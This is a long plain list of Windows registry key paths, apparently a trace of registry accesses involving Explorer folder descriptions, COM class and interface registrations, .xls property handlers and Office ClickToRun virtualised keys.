HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\ParsingName_36354489
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\ExePath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\CommandLine
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\IdentityType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\ActivatableClasses
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\ServerType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\AppId
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\Identity
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\ServiceName
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\ExplicitPsmActivationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\CustomAttributes
HKEY_CURRENT_USER\Software\Classes\Interface\{8645456F-D9A2-4B82-AFEC-58F0E8DF0ACF}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{8645456F-D9A2-4B82-AFEC-58F0E8DF0ACF}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{8645456F-D9A2-4B82-AFEC-58F0E8DF0ACF}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{8645456F-D9A2-4B82-AFEC-58F0E8DF0ACF}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{8645456F-D9A2-4B82-AFEC-58F0E8DF0ACF}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{8645456F-D9A2-4B82-AFEC-58F0E8DF0ACF}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{8645456F-D9A2-4B82-AFEC-58F0E8DF0ACF}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\Elevation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{70ce53cd-0000-0000-0000-100000000000}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{70ce53cd-0000-0000-0000-100000000000}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{70ce53cd-0000-0000-0000-100000000000}\Generation
HKEY_CURRENT_USER\Software\Classes\Interface\{89BC3F49-F8D9-5103-BA13-DE497E609167}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{89BC3F49-F8D9-5103-BA13-DE497E609167}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{89BC3F49-F8D9-5103-BA13-DE497E609167}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{89BC3F49-F8D9-5103-BA13-DE497E609167}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{89BC3F49-F8D9-5103-BA13-DE497E609167}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{89BC3F49-F8D9-5103-BA13-DE497E609167}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{89BC3F49-F8D9-5103-BA13-DE497E609167}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\SystemPropertyHandlers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\PropertySystem\SystemPropertyHandlers
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\SystemPropertyHandlers\.xls
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.xls
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.xls
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.xls\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}\OverrideFileSystemProperties
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}\OverrideFileSystemProperties
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}\OverrideFileSystemProperties
HKEY_CURRENT_USER\Software\Classes\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}\NoOplock
HKEY_CURRENT_USER\Software\Classes\ExplorerCLSIDFlags\{97E467B4-98C6-4F19-9588-161B7773D6F6}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\ExplorerCLSIDFlags\{97E467B4-98C6-4F19-9588-161B7773D6F6}
HKEY_LOCAL_MACHINE\Software\Classes\ExplorerCLSIDFlags\{97E467B4-98C6-4F19-9588-161B7773D6F6}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManager
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManager
HKEY_CURRENT_USER\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InProcHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\ActivateOnHostFlags
